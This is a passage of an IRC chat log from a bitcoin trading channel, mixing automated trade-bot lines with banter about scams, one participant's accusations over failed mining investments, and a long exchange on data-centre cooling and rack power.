22:08:52 they gotta feed the hamsters some tobacco Jan 31 22:19:40 awkorama: well, I guess im gonna be meeting with some of these guys to see if they wanna put their money where their mouth is. Jan 31 22:20:12 I'll let yall know what's up, I'm certainly gonna need dev help. Jan 31 22:20:17 [MPEX] [S.DICE] 672 @ 0.00683849 = 4.5955 BTC [-] Jan 31 22:20:50 [BTCTC] [COGNITIVE] 3 @ 0.3299 = 0.9897 BTC [+] Jan 31 22:24:21 Well, from what it sounds like, they want something similar to Pokerstars Jan 31 22:25:04 These guys were told about btc and poker a while ago but they blew it off. Now they want to get their foot in the door. Jan 31 22:25:54 i wouldn't mind listing a poker site if it were any good. Jan 31 22:28:00 hehe you're asking for it Jan 31 22:28:29 i know huh? Jan 31 22:29:13 well, these guys already have a firm foothold in legal gambling here in mn anyway. Jan 31 22:29:24 that's always good. Jan 31 22:29:55 so... im not sure. gotta talk to 'em and see what makes sense. I think they're starting to see that BTC is the way of the future. Imagine all of the old ladies and their iPad's playing slots at home... Jan 31 22:29:59 [MPEX] [S.MPOE] 14800 @ 0.00067228 = 9.9497 BTC [+] Jan 31 22:30:14 ding ding ding ding ding Jan 31 22:30:49 but yeah, I'll really need the help with some of this stuff if they're serious. I'll let you guys know more when I do :) Jan 31 22:31:09 something big it's going on ;) Jan 31 22:31:39 *for poker in BTC Jan 31 22:32:57 what we need is a big hack, gox would do Jan 31 22:33:47 something big is going on for hacking in BTC ! Jan 31 22:34:07 [MPEX] [S.DICE] 1281 @ 0.00668006 = 8.5572 BTC [-] Jan 31 22:34:12 well, hacks come and go. they're there to remind us to secure our BTC properly, right? Jan 31 22:34:27 yep 100% Jan 31 22:34:47 it's good is just for small change Jan 31 22:34:53 just a big warning Jan 31 22:35:05 actually im curious what's the next big drama Jan 31 22:35:16 the asic stuff kinda getting stale Jan 31 22:35:21 I thought it was gonna be the asics too. Jan 31 22:35:25 we need a strategic diversion before they blow up as scams Jan 31 22:35:31 why always drama.. :) Jan 31 22:35:32 im guessing its evorhees getting gitmo'd Jan 31 22:35:47 him or that mircea_popescu guy Jan 31 22:35:48 let us srsly hope not. Jan 31 22:36:13 im not that drama worthy am i Jan 31 22:36:13 huhuhuhu Jan 31 22:36:20 they are the same personn Jan 31 22:36:47 bah. why doesn't anyone think erik is mpoe-pr instead! Jan 31 22:36:52 why does everyone think everyone's me Jan 31 22:37:23 because it's a dog Jan 31 22:38:21 http://mpex.co/faq.html Jan 31 22:38:31 what's a dog Jan 31 22:38:53 srsly, how much beer do you drink before writting this FAQ ? Jan 31 22:39:14 or how many țuică Jan 31 22:40:34 [MPEX] [S.MPOE] 8300 @ 0.00066191 = 5.4939 BTC [-] Jan 31 22:40:36 apparently im using blockchain.info too much.. they just shown me windows xp boot gif instead Jan 31 22:40:52 error4734 you ever seen a better faq ? Jan 31 22:42:37 No... Jan 31 22:43:45 so then alcohol blood content .1337 Jan 31 22:44:43 but tmrw if some1 want to put 2M$ on table, idk if he'll thinks like me Jan 31 22:46:35 if he doesn't he's free to go get himself scammed and learn the hard way. Jan 31 22:46:40 he can use coinbr, then :DDD Jan 31 22:47:40 do you even have a faq ? Jan 31 22:48:03 http://www.bitcoinforum.com/coinbr-com/frequently-asked-questions/ Jan 31 22:48:21 do you even faq bro? Jan 31 22:48:27 haha Jan 31 22:49:36 whoa Jan 31 22:49:38 a forum ? Jan 31 22:49:56 yes. much better one then btctalk Jan 31 22:50:14 but they came late i think Jan 31 22:50:35 tbh at this point bitcointalk is irreplaceable. Jan 31 22:50:49 i could do five simultaneous master's degrees on it Jan 31 22:51:04 all related to "wisdom" of crowds Jan 31 22:51:51 ;;ticker Jan 31 22:51:52 BTCUSD ticker | Best bid: 21.09991, Best ask: 21.16990, Bid-ask spread: 0.06999, Last trade: 21.09991, 24 hour volume: 88274.64269609, 24 hour low: 19.51123, 24 hour high: 21.43000, 24 hour vwap: 20.53304 Jan 31 22:51:58 [HAVELOCK] [SDICE] 3 @ 0.65 = 1.95 BTC [-] Jan 31 22:55:43 [MPEX] [S.MPOE] 100 @ 0.00066191 = 0.0662 BTC [-] Jan 31 22:55:45 [MPEX] [S.MPOE] 2811 @ 0.00067228 = 1.8898 BTC [+] Jan 31 22:55:47 [MPEX] [S.MPOE] 11850 @ 0.00067411 = 7.9882 BTC [+] Jan 31 22:55:48 [MPEX] [S.MPOE] 8509 @ 0.00067487 = 5.7425 BTC [+] Jan 31 22:55:49 [MPEX] [S.MPOE] 30 @ 0.00067507 = 0.0203 BTC [+] Jan 31 22:58:54 [MPEX] [S.DICE] 1514 @ 0.00666937 = 10.0974 BTC [-] Jan 31 22:59:28 [MPEX] [S.DICE] 886 @ 0.00669921 = 5.9355 BTC [+] Jan 31 22:59:50 [MPEX] [S.DICE] 1238 @ 0.00678949 = 8.4054 BTC [+] Jan 31 23:06:16 crowd-source wisdom Jan 31 23:08:40 i can write funny summary of happenings between ukto and burnside :D Jan 31 23:08:42 ;) Jan 31 23:09:06 we'll be best friends some day. Jan 31 23:09:27 after you both fall in love for some girl. Jan 31 23:09:53 hopefully sooner Jan 31 23:10:04 mircea_popescu: married w/ kids. so prolly not Jan 31 23:11:19 ditto here. haha Jan 31 23:11:58 sounds like something that'd make a good luis de funes comedy by now. Jan 31 23:12:39 thank you, it's a fun project Jan 31 23:13:05 make it better Jan 31 23:13:08 ;) Jan 31 23:13:16 which one is it ? Jan 31 23:13:24 btct.co/litecoinglobal.com Jan 31 23:13:49 [MPEX] [S.MPOE] 12600 @ 0.00067507 = 8.5059 BTC [+] Jan 31 23:14:19 yeah, I love the bitfunder charts Jan 31 23:14:47 [MPEX] [O.BTCUSD.C190T] 1 @ 0.16602013 BTC [-] Jan 31 23:15:07 I used that same engine for charts on a previous project Jan 31 23:15:31 soo, anyone wanna recommend a good movie ? Jan 31 23:15:37 I was graphing the weighted price per Mh on several of the leading mining assets on GLBSE using it Jan 31 23:16:04 got frustrated with a few things, went a different direction for btct Jan 31 23:16:17 might end up going back, it'd be an easy swap Jan 31 23:17:02 right now? just because there are higher priority (read: more fun) things to work on Jan 31 23:17:16 lol Jan 31 23:19:41 stupid carriers using stupid equipment Jan 31 23:19:57 cogent? Jan 31 23:20:05 trying to turn up another gige, and their brocade XMR is being stupid over port negotiation Jan 31 23:20:44 we've had good luck with brocade, but don't use them for transit, only internal switching and load balancing Jan 31 23:20:46 floundry'd Jan 31 23:20:52 dub: yup Jan 31 23:21:36 one gige on one module/port is fine. they just shippd a newer model card out for our latest gige, and it wont turn up. apparently there is a firmware bug effecting the newer card. Jan 31 23:21:54 ugh, nightmare. :( Jan 31 23:21:55 which means HE.net has to do a full firmware upgrade on that core router Jan 31 23:22:06 ooh, dice is bak Jan 31 23:22:07 [MPEX] [S.MPOE] 2118 @ 0.00067507 = 1.4298 BTC [+] Jan 31 23:22:08 [MPEX] [S.MPOE] 15532 @ 0.00067536 = 10.4897 BTC [+] Jan 31 23:22:10 [MPEX] [O.BTCUSD.C190T] 1 @ 0.16599164 BTC [-] Jan 31 23:22:11 I told them "that, or just overnight another older module" Jan 31 23:22:39 prolly bunch of 'em on ebay Jan 31 23:23:18 spent the last week trying to get this port up, to be told its our side the entire time, yet the port works fine with L3/GBLX, nLayer, Equinix's switching fabric, and our own internal stuff. Jan 31 23:23:35 Configing cisco is not hard. speed neg, or noneg. Jan 31 23:24:07 now ya know why he Jan 31 23:24:11 is cheaper Jan 31 23:24:46 Bowjob was it offline ? Jan 31 23:24:52 They have a rock solid network Jan 31 23:25:02 No, I mean the profits. Jan 31 23:25:05 that was quick Jan 31 23:25:05 o o Jan 31 23:25:09 that whale got slaughtered Jan 31 23:25:10 I love their free ipv6 tunneling service Jan 31 23:25:25 Besides, being a firmware issue, I can understand their expectancy the issue being on my side Jan 31 23:25:30 sd profits... as stable as usd/btc. Jan 31 23:25:35 same for brocade, simple commands to configure a port. Jan 31 23:25:55 lol kakobreklaa Jan 31 23:26:14 heh Jan 31 23:26:14 yeah, not the behavior you'd expect for sure, definitely not something you'd think would require firmware updates Jan 31 23:26:18 Ukto: lolrouters Jan 31 23:26:27 wtf. did gox just frop from 21.14 to 20.82? x.x Jan 31 23:26:30 drop* Jan 31 23:26:36 at least we're over 20 Jan 31 23:26:44 for now. Jan 31 23:26:48 hopefully it will last Jan 31 23:27:19 burnside: besides, if its the carrier the cusomer chooses to pay for, I am happy making money on it. ;) Jan 31 23:28:06 EskimoBob: did you know you can drag-zoom on the graphs? ;) Jan 31 23:28:27 Ukto: he.net sucks dongs sometimes, btw Jan 31 23:28:52 Diablo-D3: depends on where I think Jan 31 23:29:16 Ukto: which DC are you in? Jan 31 23:29:20 my HE stuff in Armster and euro work just as good as in dallas Jan 31 23:29:25 Diablo-D3: Equinix, in all locations Jan 31 23:29:31 oh man Jan 31 23:29:32 well, all my locaitons Jan 31 23:29:36 not in all of theirs lol Jan 31 23:29:37 yeah, if the customer wants cheap bandwidth, no reason to not give it to 'em. better to keep 'em happy and take a cut. Jan 31 23:29:38 equinix is fucking expensive Jan 31 23:29:47 yes, yes they are Jan 31 23:30:00 >>Yeah. The BTC-sphere is like in the meatspace: you may be punished just for pennies, but if you scam really big time you become Too Big To Jail. Learn the lesson and don't trust anyone ever more, especially the big fat fishes with super-hero rep. Jan 31 23:30:08 i hate having to pay $200 to have them do a hard loopback in other countries jsut to test a fiber Jan 31 23:30:08 fuck i need to scam one or two to lower my rating Jan 31 23:30:18 cant get any biz with perfect grade anymore! Jan 31 23:30:35 kakobreklaa: I dont trust anyone, to be honest Jan 31 23:30:39 DMC 2.0 will have a new rule Jan 31 23:30:44 no investing in other bitcoin companies Jan 31 23:30:45 period Jan 31 23:30:50 DMC2.0 rule: dont trust diablo Jan 31 23:30:53 not even asicminer, the only successful bitcoin company ever Jan 31 23:30:59 kakobreklaa: trusting me isnt the issue Jan 31 23:31:01 other companies non-bitcoin related can be just as bad Jan 31 23:31:12 kakobreklaa: hell, Im paying out of my own pocket to deal with this shit, and Im permabroke Jan 31 23:31:21 the only think you can trust a bank to do, is win Jan 31 23:31:21 :P Jan 31 23:31:23 Ukto: at least them you can sue Jan 31 23:31:27 Diablo-D3 deal with what shit Jan 31 23:31:34 kakobreklaa: nefario's bullshit Jan 31 23:31:51 and how much did it cost you out of your pocket so far? Jan 31 23:32:35 EskimoBob_afk: because I usually dont take programming jobs Jan 31 23:32:35 its preety hard to go broke with a deflationary bitcoin Jan 31 23:33:10 hello Jan 31 23:33:16 how are you today EskimoBob_afk Jan 31 23:33:22 kakobreklaa: I have about 240 btc in my wallet thus far Jan 31 23:33:31 kakobreklaa i can re-rate you for the fsa stuff, no problem Jan 31 23:33:36 damn Diablo-D3 is ballin' Jan 31 23:33:44 nice EskimoBob_afk Jan 31 23:33:49 kakobreklaa: which is better than the 0 that nefario left us. Jan 31 23:33:53 [MPEX] [S.MPOE] 3200 @ 0.00066923 = 2.1415 BTC [-] Jan 31 23:34:06 wow. Jan 31 23:34:10 Diablo-D3 how much did it cost you from your own pocket? Jan 31 23:34:30 my 7yr old son just came to me takling about plant vs zombies. and says "I wanna be a game designer when I grow up. You know what game I wanna make? Plant vs zombies 2" Jan 31 23:35:14 tell him Jan 31 23:35:17 hes gonna get sued Jan 31 23:35:21 when did asicminer become successful to begin with ? Jan 31 23:35:27 I simply told him its already in the works Jan 31 23:35:28 :P Jan 31 23:35:34 his response was "Poopies!" Jan 31 23:35:35 kakobreklaa: I could sell the 240 btc and not have to worry about money for awhile. Jan 31 23:35:52 Ukto i thought it would be : "how about 3?" Jan 31 23:36:14 Diablo-D3 wtf is this suppose to mean Jan 31 23:36:15 lol Jan 31 23:36:17 hehe Jan 31 23:36:24 that you are paying out of your pocket not to be a fuckin scammer Jan 31 23:36:28 kakobreklaa: it means the 240 btc are out of my own pocket and will be spent on DMC. Jan 31 23:36:41 poopies Jan 31 23:36:43 investors have no pockets Jan 31 23:36:56 PotsiRewards: whats up with the nick? Jan 31 23:37:09 u no like rewards Jan 31 23:37:11 ? Jan 31 23:37:18 what;s a potsi Jan 31 23:37:26 its the cousin of a ponzi Jan 31 23:37:27 like patsy ? Jan 31 23:37:30 same thing, just diff clothes :P Jan 31 23:37:33 lmao i already got several times my initial btc investment back... Jan 31 23:37:34 kakobreklaa: and remember, I also burned the shares I had in DMC as well Jan 31 23:37:52 you had shares ? Jan 31 23:37:55 burnside: do you think the avalons will start to make a dent in the mining assets value? Jan 31 23:38:09 my new company Jan 31 23:38:14 very trust #1 Jan 31 23:38:26 good enough for me, whre do I invest? Jan 31 23:38:27 ;) Jan 31 23:38:30 do you make asics PotsieRewards ? Jan 31 23:38:31 exactly Jan 31 23:38:37 Ukto, I'm it will. I'm not sure how much, but the assets that don't have asic plans are going to get kind of ugly Jan 31 23:38:49 throw your money at the screen and watch it fall back in your lap Jan 31 23:39:00 PotsieRewards: 1 sec Jan 31 23:39:06 no refunds Jan 31 23:39:08 http://www.youtube.com/watch?v=GA50pZQRgYU Jan 31 23:39:14 WOOH, I just made $500! Jan 31 23:39:21 how Jan 31 23:39:23 i dont have any money. can i throw pate ? Jan 31 23:39:27 I am Mr. Messan Johnson Esq from Lome Togo. My new company very trust #1 Jan 31 23:39:37 mircea_popescu: is it in a tube? :) Jan 31 23:39:42 Bowjob: was a jooke about throwing money at the screen Jan 31 23:39:45 it's in a tin Jan 31 23:39:54 says FRAENC Jan 31 23:40:35 very trust #1 top rewards Jan 31 23:40:39 send money now. Jan 31 23:41:19 http://polimedia.us/dtng/c/src/135936054067.jpg ? Jan 31 23:41:27 kakobreklaa: I mean, you can say what you want, but at least Im trying to fix it the best I can Jan 31 23:41:43 ;;google FRAENC pate Jan 31 23:41:44 Foie gras - Wikipedia, the free encyclopedia: ; Pâté - Wikipedia, the free encyclopedia: ; Travel friendly Pate and Cheese - France - Chowhound: Jan 31 23:41:45 hey im just trying to grasp whats happening Jan 31 23:41:54 mircea_popescu u find pictures of my PR Jan 31 23:42:03 which one of them ? Jan 31 23:42:09 top trust rewards for early adopters Jan 31 23:42:18 legitimate Jan 31 23:42:18 my google bubble returns a bunch of crypto related links Jan 31 23:42:23 they don't look young enough t obe adopted PotsieRewards Jan 31 23:42:28 kakobreklaa: the short of it is nefario in league with people issuing fake mining bonds to steal money from investors Jan 31 23:42:28 nothing pate related at all Jan 31 23:42:48 dub was just dicking around with fake dyslexia. Jan 31 23:43:01 Diablo-D3 how does taht affect you? Jan 31 23:43:07 it shoudlnt Jan 31 23:43:14 the nefario league! Jan 31 23:43:19 kakobreklaa: DMC was renting mining power from these people Jan 31 23:43:19 [MPEX] [S.MPOE] 3445 @ 0.00067536 = 2.3266 BTC [+] Jan 31 23:43:20 [MPEX] [S.MPOE] 14150 @ 0.00067596 = 9.5648 BTC [+] Jan 31 23:43:21 [MPEX] [S.MPOE] 20058 @ 0.00067626 = 13.5644 BTC [+] Jan 31 23:43:22 [MPEX] [S.MPOE] 6056 @ 0.0006769 = 4.0993 BTC [+] Jan 31 23:43:24 [MPEX] [S.MPOE] 2991 @ 0.00067691 = 2.0246 BTC [+] Jan 31 23:43:31 kakobreklaa: until we could afford to build the DC and install our own mining hardware Jan 31 23:44:09 kakobreklaa: when glbse collapsed, two of these investments seem to have just walked away Jan 31 23:44:14 and windmills Jan 31 23:44:43 Fusion energy is the way to go Jan 31 23:44:45 kakobreklaa: the third is asicminer which has not yet paid dividends yet (they should begin mining first week of feb) Jan 31 23:44:52 Ukto: solar and wind IS fusion energy. Jan 31 23:45:01 :P Jan 31 23:45:08 Ukto: why build fusion reactors when we're in orbit around a gigantic fusion reactor Jan 31 23:45:15 +1 Jan 31 23:45:36 hehe Jan 31 23:45:51 what are the 2 that walked away Jan 31 23:45:58 I was working on a way to collect head from my DC and transform it into energy Jan 31 23:46:03 solar is bullshit Jan 31 23:46:22 why ? Jan 31 23:46:30 pigeons: btc-mining and btcmc Jan 31 23:46:40 massive lobbing try to keep this idea true Jan 31 23:46:42 kakobreklaa: and its not, its just that most people, such as yourself, simply does not understand solar Jan 31 23:46:49 DC pumps out a ton of heat. I wish I could just pump it to local houses or something, sell it somehow. Jan 31 23:47:01 burnside: a DC doesnt NEED to pump out a lot of heat Jan 31 23:47:03 Diablo-D3 i installed about 1 megawatt of solar power plants Jan 31 23:47:09 Diablo-D3 how much did you Jan 31 23:47:15 [MPEX] [S.DICE] 1550 @ 0.00665746 = 10.3191 BTC [-] Jan 31 23:47:16 Diablo-D3: is this the same btc-mining that is now on btct.co? Jan 31 23:47:17 kakobreklaa: only 1? Jan 31 23:47:21 [MPEX] [S.DICE] 1800 @ 0.00673464 = 12.1224 BTC [+] Jan 31 23:47:23 [MPEX] [S.DICE] 152 @ 0.00678949 = 1.032 BTC [+] Jan 31 23:47:31 pigeons: yes, the same one namworld manages Jan 31 23:47:41 Diablo-D3 yes, is that 1 more than you? Jan 31 23:47:46 Diablo-D3, it does when a bunch of the boxes are mining coins. ;) Jan 31 23:48:10 We're actually pretty green. We cool with outside air 80% of the year Jan 31 23:48:12 what does namworld say about that? is he paying dividends over on btct? Jan 31 23:48:13 burnside: DMC's DC was specializing in high density compute, bitcoin doesnt quite fit that definition Jan 31 23:48:29 pigeons: amazingrando basically fucked him and everyone else Jan 31 23:48:48 burnside: I ran dual redundant 400kva liebert ups at my last facility, had redundant megawatt feeds comming in. our usage peaked at about .7mw Jan 31 23:48:56 so we generated a lot of heat. ;) Jan 31 23:49:04 20k profit for dice Jan 31 23:49:12 [MPEX] [S.MPOE] 3250 @ 0.00067421 = 2.1912 BTC [-] Jan 31 23:49:12 pigeons: theres no dividends to pay because amazingrando isnt paying them out Jan 31 23:49:13 [MPEX] [S.MPOE] 6199 @ 0.00067691 = 4.1962 BTC [+] Jan 31 23:49:15 [MPEX] [S.MPOE] 3251 @ 0.00067709 = 2.2012 BTC [+] Jan 31 23:49:33 burnside, Ukto: dmc was going to be doing rack densities of 25-30kw per rack. Jan 31 23:49:36 haha, that is a ton of heat. Jan 31 23:49:37 thanks Jan 31 23:49:51 I designed a custom "green" handler for the heat. setup the heat flow to vent the heat out of the building, and in winter, sucked in cold air from the other side Jan 31 23:50:09 Ukto: thats called an air economizer, btw Jan 31 23:50:14 let me tell you, it cut down my chilled water bill like mad ;) Jan 31 23:50:34 building was a little annoyed tho Jan 31 23:50:35 We had to do a custom gig too, the economizer unit for our air handler was going to be 10x what we could build ourselves. Jan 31 23:50:52 10x $$ that is Jan 31 23:50:55 cause while I pushed my hot air out, and had my air handlers for the chilled water, I was sucking cold air in from the building. :P Jan 31 23:51:02 their engineer gave us permission. LOL Jan 31 23:51:14 Ukto: DMC was going to use a combination of air economizers and in row water chilling using hot aisle containment Jan 31 23:51:30 top number one trust Jan 31 23:51:32 Diablo-D3: honestly its overkill Jan 31 23:51:36 haha, that's awesome. feeding on the building hvac? Jan 31 23:51:41 and then use on-site vertical geothermal pumps to pull up extra cold water Jan 31 23:52:03 ^^ I'd love to do Jan 31 23:52:19 I was using the badass APC cabinets Jan 31 23:52:26 APC does make decent cabs Jan 31 23:52:34 and was talking with them about doing door based chilled cooling units Jan 31 23:52:38 but the cost Jan 31 23:52:42 Ukto: btw, what I said isnt overkill when you're doing 25-30kw per rack Jan 31 23:52:43 risk exposure Jan 31 23:52:43 etc Jan 31 23:52:46 wasnt worth it Jan 31 23:52:55 the industry average is 2-4kw per rack, never filled to max Jan 31 23:53:02 what are you putting in the cabinets Jan 31 23:53:04 load testers? Jan 31 23:53:06 :P Jan 31 23:53:11 whatever the customer wants Jan 31 23:53:23 but most likely tightly packed blades and thumpers Jan 31 23:53:26 and your charging them $10~15k ? Jan 31 23:53:50 Ukto: probably $20k-$25k with all the power you need Jan 31 23:54:52 lemme tell you, i had to push hard to get a good deal out of equix for it Jan 31 23:55:00 Ukto: Im being lazy, whats that in watts Jan 31 23:55:41 -_- Jan 31 23:55:55 its not 6000. Jan 31 23:55:55 lol Jan 31 23:56:03 no Jan 31 23:56:47 4.8kW Jan 31 23:56:51 [MPEX] [S.DICE] 200 @ 0.00706606 = 1.4132 BTC [+] Jan 31 23:57:07 you're only using that in the whole rack? wtf Jan 31 23:57:43 Ukto: btw, since the DC is in maine and we get ice cold weather 3 months of the year, and pretty chilly weather 6 months of the year Jan 31 23:57:57 [MPEX] [S.MPOE] 13599 @ 0.00067709 = 9.2077 BTC [+] Jan 31 23:57:58 [MPEX] [S.MPOE] 3701 @ 0.00067745 = 2.5072 BTC [+] Jan 31 23:58:00 it could be up to 3 months of AC not running Jan 31 23:58:05 hehe Jan 31 23:58:15 just air economization and thats it Jan 31 23:59:05 Ukto: okay so, 4.8kw _the whole rack_ and its all blades top to bottom? Jan 31 23:59:43 The cab has 4 30amp 240v circuits Feb 01 00:00:04 2 A + 2 B Feb 01 00:00:16 I wish we'd built out like that Feb 01 00:00:28 [MPEX] [S.MPOE] 6191 @ 0.00067745 = 4.1941 BTC [+] Feb 01 00:00:35 ppl who dont use 240v loose money Feb 01 00:00:41 10 yrs ago we thought 4x20A 120v per rack was insane Feb 01 00:00:44 so much more efficient Feb 01 00:01:08 we're having to redo a lot of it now Feb 01 00:01:15 yup Feb 01 00:01:34 my site used to allow up to 4x 30amp 240v primary Feb 01 00:01:44 24" raised floor Feb 01 00:02:04 an 50ton leibert air handlers for chilled water lining the walls Feb 01 00:02:05 heh, relevant http://www.newscientist.com/article/mg21729024.500-keep-rainforests--they-drive-the-planets-winds.html Feb 01 00:02:05 is your airflow in the floor? Feb 01 00:02:17 always Feb 01 00:02:18 wind != fusion Feb 01 00:02:30 save money by controling air needs Feb 01 00:02:38 if only half your facility is in use Feb 01 00:02:55 you use dampers to control airflow, and only put perpherated tiles where you need them Feb 01 00:03:03 if your pressure drops, you need to turn another unit on. Feb 01 00:03:19 we did some math and didn't think the perforated tiles had enough surface area to cool the higher heat racks Feb 01 00:03:28 depends on design and use Feb 01 00:03:50 as I said, I was talking to APC abotu chilled cab doors Feb 01 00:04:02 and decided to do bottom tile-fed vented distributed doors Feb 01 00:04:04 that I had custom made Feb 01 00:04:33 so air was fed via the bottom cold side of the cabinet Feb 01 00:04:46 into a thin airshaft that ran up the door with air vents Feb 01 00:04:48 [05:02:11] an 50ton leibert air handlers for chilled water lining the walls Feb 01 00:04:55 sounds pretty good Feb 01 00:04:56 yeah all that shit I hate Feb 01 00:04:59 its so goddamned fucking inefficient Feb 01 00:05:06 Diablo-D3: I agree Feb 01 00:05:09 use hot aisle containment with in row chillers Feb 01 00:05:11 what's the temperature differential between the bottom of the rack and the top? Feb 01 00:05:13 hence why I changed things Feb 01 00:05:15 hot air goes right into the cooling units Feb 01 00:05:29 burnside: a lot if you're doing shit wrong Feb 01 00:05:29 burnside: front side was a reverse design with intake fans Feb 01 00:05:55 so most heat was quickly removed and replaced with cold Feb 01 00:06:07 I mean on the cold side, with it coming from the bottom up, did you see a wide swing in the intake temp on the servers at the top of the rack? Feb 01 00:06:13 even the heavy loaded cabs maintained a high of 80degrees Feb 01 00:06:30 nice, seems pretty good Feb 01 00:06:36 it wasnt that bad, about 4 degrees Feb 01 00:06:49 there were fans in the intake door at 2points Feb 01 00:06:56 so air would amke it all the way up Feb 01 00:06:58 ofc Feb 01 00:07:01 Ukto: btw, the cab mounted chillers I dont like Feb 01 00:07:02 this was optional to the customer Feb 01 00:07:08 they could choose to use the flow doors for free Feb 01 00:07:10 they're too expensive and they're not redundant enough Feb 01 00:07:11 (which they always did) Feb 01 00:07:17 but the had to plug the fans into their own power Feb 01 00:07:18 ;) Feb 01 00:07:49 never a had a customer who didnt want/use em lol Feb 01 00:07:50 if you're using in row cooling, if one of that row's chillers dies, the other take up the slack Feb 01 00:08:14 Diablo-D3: umm, the system was fully redundant Feb 01 00:08:22 since I was basically n+3 units Feb 01 00:08:29 and you maintain pressure for the whole floor Feb 01 00:08:29 Ukto: I dunno, all the chillers Ive seen that replace the backdoors are still just one chiller unit Feb 01 00:08:36 yeah Feb 01 00:08:40 this wasnt a chllder door Feb 01 00:08:46 oh Feb 01 00:08:49 i had custom doors machined Feb 01 00:08:59 I think Diablo was referring to the APC units you decided not to use Feb 01 00:09:14 ah yeah, it was somethign they were talking about back in.. 2008? Feb 01 00:09:15 burnside: I said in row, not In-Row(tm) Feb 01 00:09:23 heh Feb 01 00:09:34 yes, APC calls their in row shit In-Row(tm) its annoying Feb 01 00:09:34 not sure if they made them public, but were offered at enterprise levels Feb 01 00:09:51 they do make shit that glues to their APC cabs though Feb 01 00:09:57 0,o Feb 01 00:10:01 back door and front door replacements that force feeds the rack Feb 01 00:10:32 but it still takes up room in the goddamned row, its not a backdoor chiller assembly Feb 01 00:10:50 its like a single rack hot aisle containment Feb 01 00:10:52 its retarded Feb 01 00:10:55 its on APC's site somewhere Feb 01 00:10:56 I get the feeling that those get used a lot more at small business setups where they end up with a rack of gear in a 4'x4' closet. Feb 01 00:11:00 yeah Feb 01 00:11:03 its stupid Feb 01 00:11:07 it contains the hot air Feb 01 00:11:14 and when I asked about it Feb 01 00:11:26 they said your supporsed to contain, and colelct the hot air Feb 01 00:11:31 on a per hot isle basis Feb 01 00:11:49 hot air containment works wonders, but that is NOT how its done Feb 01 00:11:57 yeah Feb 01 00:12:21 we were going to have raised floors too, but only for the water Feb 01 00:12:47 outside air vent shit and electricity and net was going to be overhead Feb 01 00:13:05 [MPEX] [S.DICE] 257 @ 0.00706606 = 1.816 BTC [+] Feb 01 00:13:46 [MPEX] [S.MPOE] 17953 @ 0.00067098 = 12.0461 BTC [-] Feb 01 00:15:27 [MPEX] [S.MPOE] 5197 @ 0.00067098 = 3.4871 BTC [-] Feb 01 00:15:29 [MPEX] [S.MPOE] 11151 @ 0.00066923 = 7.4626 BTC [-] Feb 01 00:15:30 [MPEX] [S.MPOE] 9702 @ 0.00066627 = 6.4642 BTC [-] Feb 01 00:16:42 [MPEX] [S.DICE] 343 @ 0.00706606 = 2.4237 BTC [+] Feb 01 00:17:20 would you guys say that s.dice is still a good investment @ 0.007xx Feb 01 00:22:27 i wouldn't know Bowjob i do not gamble Feb 01 00:22:35 god punishes wicked sinner gamblers Feb 01 00:25:57 by giving the monies to the shareholders Feb 01 00:26:14 just +750K$ in 2 month... Feb 01 00:29:21 enough for tobacco. Feb 01 00:31:39 No darn tobacco, thats for sure. Feb 01 00:32:35 [MPEX] [S.DICE] 540 @ 0.00724211 = 3.9107 BTC [+] Feb 01 00:45:16 Is this thing on? Feb 01 00:47:03 nope Feb 01 00:47:57 On my phone Feb 01 00:49:31 connectbot ftw! Feb 01 01:04:24 [MPEX] [S.MPOE] 9550 @ 0.00067317 = 6.4288 BTC [+] Feb 01 01:09:58 [MPEX] [S.MPOE] 16300 @ 0.00067317 = 10.9727 BTC [+] Feb 01 01:10:00 [MPEX] [S.MPOE] 850 @ 0.00067066 = 0.5701 BTC [-] Feb 01 01:10:01 [MPEX] [S.MPOE] 1104 @ 0.00067044 = 0.7402 BTC [-] Feb 01 01:14:44 !help Feb 01 01:14:45 List of commands: Feb 01 01:14:46 !ticker (desc: returns current ticker values, supported: MPEX, HAVELOCK, BTCTCO) Feb 01 01:15:05 !ticker MPEX S.DICE Feb 01 01:15:07 [MPEX:S.DICE] 1D: 0.00534524 / 0.00699327 / 0.00739499 (89508 shares, 625.95 BTC), 7D: 0.00534524 / 0.00715946 / 0.0075 (624824 shares, 4,473.41 BTC), 30D: 0.00085848 / 0.00475863 / 0.0075 (6578516 shares, 31,304.74 BTC) Feb 01 01:19:59 [MPEX] [S.MPOE] 373 @ 0.00066987 = 0.2499 BTC [-] Feb 01 01:21:36 [MPEX] [S.BVPS] 17 @ 0.01499991 = 0.255 BTC [+] Feb 01 01:23:09 [MPEX] [S.MPOE] 748 @ 0.00066627 = 0.4984 BTC [-] Feb 01 01:23:10 [MPEX] [S.MPOE] 2050 @ 0.00066426 = 1.3617 BTC [-] Feb 01 01:23:12 [MPEX] [S.MPOE] 1134 @ 0.00066322 = 0.7521 BTC [-] Feb 01 01:23:19 [MPEX] [S.DICE] 35 @ 0.00724211 = 0.2535 BTC [+] Feb 01 01:24:45 [MPEX] [S.BBET] 157 @ 0.001599 = 0.251 BTC [-] Feb 01 01:27:59 [MPEX] [S.MPOE] 2200 @ 0.00066322 = 1.4591 BTC [-] Feb 01 01:38:44 [MPEX] [S.MPOE] 4000 @ 0.00066987 = 2.6795 BTC [+] Feb 01 01:42:17 How many shares did ASICMINER sell? Feb 01 01:50:39 [MPEX] [S.MPOE] 9539 @ 0.00066322 = 6.3265 BTC [-] Feb 01 01:50:40 [MPEX] [S.MPOE] 4823 @ 0.00066987 = 3.2308 BTC [+] Feb 01 01:50:40 [MPEX] [S.MPOE] 6100 @ 0.00067317 = 4.1063 BTC [+] Feb 01 01:50:40 [MPEX] [S.MPOE] 1994 @ 0.00067706 = 1.3501 BTC [+] Feb 01 01:59:14 !ticker m s.dice Feb 01 01:59:16 [MPEX:S.DICE] 1D: 0.00534524 / 0.00698411 / 0.00739499 (87243 shares, 609.31 BTC), 7D: 0.00534524 / 0.00716125 / 0.0075 (623659 shares, 4,466.18 BTC), 30D: 0.00085848 / 0.00476381 / 0.0075 (6548683 shares, 31,196.73 BTC) Feb 01 02:11:57 [MPEX] [S.MPOE] 5160 @ 0.00067204 = 3.4677 BTC [-] Feb 01 02:16:06 wtf is this shit Feb 01 02:16:19 mircea_popescu: is manipulating da market Feb 01 02:16:43 ;;bids 19 Feb 01 02:16:45 There are currently 21301.298 bitcoins demanded at or over 19.0 USD, worth 421722.684703 USD in total. Feb 01 02:17:02 ;;asks 21 Feb 01 02:17:04 There are currently 2446.5034 bitcoins offered at or under 21.0 USD, worth 51124.3598663 USD in total. Feb 01 02:17:16 ;;asks 20 Feb 01 02:17:19 There are currently 0 bitcoins offered at or under 20.0 USD, worth 